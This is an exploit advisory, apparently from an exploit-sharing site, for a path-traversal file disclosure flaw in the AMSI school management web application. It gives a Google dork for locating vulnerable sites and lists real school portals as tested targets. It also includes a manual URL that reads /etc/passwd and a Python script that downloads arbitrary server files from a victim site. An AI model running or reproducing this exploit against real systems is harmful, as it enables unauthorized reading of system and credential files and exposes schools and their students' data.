AMSI 3.20.47 Build 37 File Disclosure

2014.12.25
Credit: KnocKout
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:\"?load=news/search_news\"

.__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ AMSI v3.20.47 build 37 <= Remote File Disclosure Exploit (.py) ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] Exploit Developed by : B3mB4m [~] HomePage : http://h4x0resec.blogspot.com [~] Guzel Insanlar : ZoRLu, ( milw00rm.com ), Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon, PRoMaX, alpican, EthicalHacker, BurakGrs ########################################################### ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : AMSI ( Academia management solutions international ) |~Affected Version : v3.20.47 build 37 |~Software : http://amsi.ae - http://iconnect.ae |~RISK : Medium |~Google Keyword/Dork : inurl:"?load=news/search_news" |~Tested On : [L] Kali Linux \ [R] example sites ####################INFO################################ makes it possible to read all the files from the local base. ####################################################### ### Error Line in 'download.php' ## .. $path = str_replace('/download.php?file=','',$_SERVER['REQUEST_URI']); // $path = $_GET['file']; header("Content-Description: File Transfer"); header("Content-Type: application/force-download"); //header("Content-Disposition: attachment; filename=" . basename($path . $uri[1])); header("Content-Disposition: attachment; filename=\"" . basename($path . $uri[1]) . "\"" ); @readfile($path); .. ######################################################## Example and tested on; http://portal.iconnect.ae/ http://demo.iconnect.ae/ http://barsha.almawakeb.sch.ae/ http://portal.naischool.ae/ http://portal.ias-dubai.ae/ http://portal.madarschool.ae/ http://portal.isas.sch.ae/ http://portal.alsanawbarschool.com/ http://fia.fischools.com/ http://portal.ajyal.sch.ae/ http://portal.arabunityschool.com/ http://alnashaa.sch.ae/ http://portal.aaess.com/ ############################################################ Manual Exploitation; http://$VICTIM/download.php?file=../../../../etc/passwd ############################################################ =========Automatic File Source Downloader Exploit ======== ##################### exploit.py ############################## # Coded by b3mb4m import random import os import urllib class B3mB4m(object): def example(self): print """ How to use ? Website: http://VICTIM.com Path : /download.php?file=../../../../etc/passwd """ def exploit(self): ask = raw_input("Website :") uz = raw_input("Path : ") #ask = "http://alnashaa.sch.ae" #uz = "/download.php?file=../../../../etc/passwd" uniq = str(random.randrange(1,1000+1))+".txt" filee = ask+uz try: urllib.urlretrieve(filee, uniq); print "\t\nDownload complate ! " os.startfile(uniq) except: B3mB4m().example() if __name__ == '__main__': B3mB4m().exploit()


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top